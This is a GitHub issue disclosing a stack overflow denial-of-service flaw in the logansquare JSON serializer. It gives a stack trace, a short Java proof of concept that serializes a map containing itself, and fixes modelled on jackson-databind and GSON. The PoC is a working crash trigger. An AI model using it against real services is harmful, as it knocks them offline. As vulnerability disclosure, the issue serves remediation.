Skip to content

Stack overflow error caused by logansquare serialization Map #238

New issue
New issue
Open
Open
Stack overflow error caused by logansquare serialization Map#238
@PoppingSnack

Description

@PoppingSnack
PoppingSnack
opened on Jun 8, 2023

Stack overflow error caused by logansquare serialization Map

Description

logansquare before v1.3.7 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at java.base/java.lang.String.getChars(String.java:854)
	at com.fasterxml.jackson.core.json.WriterBasedJsonGenerator._writeString(WriterBasedJsonGenerator.java:1087)
	at com.fasterxml.jackson.core.json.WriterBasedJsonGenerator._writeFieldName(WriterBasedJsonGenerator.java:190)
	at com.fasterxml.jackson.core.json.WriterBasedJsonGenerator.writeFieldName(WriterBasedJsonGenerator.java:155)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:312)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:26)
	at com.bluelinelabs.logansquare.internal.objectmappers.MapMapper.serialize(MapMapper.java:14)
	at com.bluelinelabs.logansquare.internal.objectmappers.ObjectMapper.serialize(ObjectMapper.java:65)
	at com.bluelinelabs.logansquare.JsonMapper.serialize(JsonMapper.java:316)

PoC

        <dependency>
            <groupId>com.bluelinelabs</groupId>
            <artifactId>logansquare</artifactId>
            <version>1.3.7</version>
        </dependency>
import com.bluelinelabs.logansquare.LoganSquare;

import java.io.IOException;
import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        try {
            LoganSquare.serialize(map);
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions